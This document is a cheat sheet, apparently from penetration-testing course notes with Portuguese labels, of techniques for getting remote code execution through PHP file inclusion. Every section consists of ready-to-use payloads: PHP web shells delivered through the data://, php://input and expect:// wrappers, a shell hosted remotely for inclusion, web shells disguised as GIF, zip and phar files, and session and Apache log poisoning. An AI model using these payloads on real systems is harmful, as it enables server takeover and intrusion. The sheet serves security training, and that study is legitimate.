# Remote Code Execution

### PHP Wrappers

| `/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id`                    | RCE com wrapper de dados   |
| --------------------------------------------------------------------------------------------------------------------------- | -------------------------- |
| `curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"` | RCE com wrapper de entrada |
| `curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"`                                                        | RCE com wrapper expect     |

### RFI

| `echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>` | Host web shell               |
| ---------------------------------------------------------------------------------------------- | ---------------------------- |
| `/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id`                        | Incluir shell web PHP remoto |

### LFI and File Uploads

| `echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif`                        | Criar imagem maliciosa                   |
| ------------------------------------------------------------------------------ | ---------------------------------------- |
| `/index.php?language=./profile_images/shell.gif&cmd=id`                        | RCE com imagem maliciosa carregada       |
| `echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php` | Crie um arquivo zip malicioso 'como jpg' |
| `/index.php?language=zip://shell.zip%23shell.php&cmd=id`                       | RCE com zip malicioso carregado          |
| `php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg`            | Crie um phar malicioso 'como jpg'        |
| `/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id`     | RCE com phar carregado malicioso         |

### Log Poisoning&#x20;

| `/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd`         | Ler parâmetros de sessão PHP              |
| ----------------------------------------------------------------------------------- | ----------------------------------------- |
| `/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E`       | Sessão de envenenamento PHP com shell web |
| `/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id`  | RCE através de sessão PHP envenenada      |
| `curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'` | Log do servidor Poison                    |
| `/index.php?language=/var/log/apache2/access.log&cmd=id`                            | RCE através de sessão PHP envenenada      |